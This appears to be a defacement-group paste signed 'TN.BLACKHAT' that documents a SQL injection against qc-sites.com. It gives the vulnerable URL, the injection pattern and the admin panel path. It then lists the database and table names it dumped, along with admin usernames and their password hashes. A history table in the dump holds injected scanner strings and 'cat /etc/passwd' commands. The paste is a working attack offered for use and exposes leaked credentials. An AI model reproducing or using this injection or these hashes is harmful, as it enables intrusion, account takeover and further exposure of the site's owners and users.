qc-sites.com

1. ################################################## TN.BLACKHAT##########################################
2.  
3. Url http://www.qc-sites.com/issue.php?year=-1 OR 17-7=10
4. Attack Pattern : -1 OR 17-7=10
5.  
6. http://www.qc-sites.com/webadmin/
7.  
8.  
9. available databases [5]:
10. [*] information_schema
11. [*] mysql
12. [*] qcsites_db
13. [*] sites
14. [*] test
15.  
16. Database: qcsites_db
17. [30 tables]
18. +---------------------+
19. | ad |
20. | admin |
21. | art |
22. | construction |
23. | consultant |
24. | directories |
25. | energy |
26. | events |
27. | files |
28. | files_images |
29. | files_images_thumbs |
30. | focus |
31. | history |
32. | international |
33. | interview |
34. | issue |
35. | local |
36. | news |
37. | parameters |
38. | plugin_extensions |
39. | project |
40. | project_focus |
41. | safety |
42. | session |
43. | session_vars |
44. | settings |
45. | tagged_files |
46. | tags |
47. | translations |
48. | users |
49. +---------------------+
50.  
51.  
52.  
53.  
54. Table: admin
55. [1 entry]
56. +-------+
57. | admin |
58. +-------+
59. | \x08 |
60. +-------+
61. admin d033e22ae348aeb5660fc2140aec35850c4da997
62. a 8b1a9953c4611296a827abf8c47804d7
63. qcsadmin 4bf8bb8c0df302d348af6e37fd94b343
64.  
65.  
66.  
67. *******************
68. Table: history
69.  
70. user passn
71.  
72. SomeCustomInjectedHeader:injected_by_wvs 1f1767b5696e79116b116e37fd94b343 0
73. SomeCustomInjectedHeader:injected_by_wvs 1f1767b5696e79116b116e37fd94b343 0
74. SomeCustomInjectedHeader:injected_by_wvs 1f1767b5696e79116b116e37fd94b343 0
75. cat /etc/passwd 1f1767b5696e79116b116e37fd94b343 0
76. cat /etc/passwd 1f1767b5696e79116b116e37fd94b343 0
77. cat /etc/passwd 1f1767b5696e79116b116e37fd94b343 0
78. cat /etc/passwd 1f1767b5696e79116b116e37fd94b343 0
79. netsparker(0x0009D5); eccbc87e4b5ce2fe28306e37fd94b343 0
80. SomeCustomInjectedHeader:injected_by_wvs 1f1767b5696e79116b116e37fd94b343 0
81. SomeCustomInjectedHeader:injected_by_wvs 1f1767b5696e79116b116e37fd94b343 0
82. SomeCustomInjectedHeader:injected_by_wvs 1f1767b5696e79116b116e37fd94b343 0
83. SomeCustomInjectedHeader:injected_by_wvs 1f1767b5696e79116b116e37fd94b343 0
84. ns:netsparker056650=vuln eccbc87e4b5ce2fe28306e37fd94b343 0
85. SomeCustomInjectedHeader:injected_by_wvs 1f1767b5696e79116b116e37fd94b343 0
86. SomeCustomInjectedHeader:injected_by_wvs 1f1767b5696e79116b116e37fd94b343 0
87. SomeCustomInjectedHeader:injected_by_wvs 1f1767b5696e79116b116e37fd94b343 0